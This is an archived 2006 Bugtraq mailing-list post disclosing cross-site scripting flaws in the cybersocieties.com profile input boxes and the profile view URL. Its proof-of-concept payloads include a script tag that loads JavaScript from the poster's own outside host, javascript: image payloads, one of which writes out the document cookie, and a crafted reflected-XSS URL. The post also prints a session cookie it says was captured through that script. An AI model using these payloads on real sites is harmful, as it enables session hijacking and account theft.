lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20060612223039.2206.qmail@securityfocus.com>
Date: 12 Jun 2006 22:30:39 -0000
From: luny@...fucktard.com
To: bugtraq@...urityfocus.com
Subject: Cybersocieties.com - XSS & cookie disclosure


Cybersocieties.com


Homepage:
http://www.cybersocieties.com

Effected files:

* Input boxes in profile:

- Full name box
- Occupation box
- MSN box
- Yahoo box
- AIM Box

* Viewing a profile

------------------------------------------------------

XSS vuln via input boxes in profile:

No filter evasion is needed. For PoC try putting the following codesin one of theboxes mentioned above:

<SCRIPT SRC=http://youfucktard.com/xss.js></SCRIPT>
or:

<IMG SRC=javascript:alert('XSS')>

or:

<IMG SRC="javascript:document.write(document.cookie)">

etc


Screenshots:
http://www.youfucktard.com/xsp/cyberso1.jpg
http://www.youfucktard.com/xsp/cyberso2.jpg
http://www.youfucktard.com/xsp/cyberso3.jpg

Our Cookie:

This is remote text via xss.js located at youfucktard.com CFTOKEN=544ABB96-138B-14A6-ADAD1496630F53D7; CFID=436305; USERID=28506

--------------------------------------------------------
Viewing a profile XSS vuln PoC:

http://www.cybersocieties.com/index.cfm?fractal=bsw.dsp.home.main&UserID=28506&tab=3">">">">">'><SCRIPT></SCRIPT><BR><BR><IMG%20SRC=javascript:alert('XSS')><"<"<"<"<""><"<'

Screenshot:
http://www.youfucktard.com/xsp/cyberso4.jpg


Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ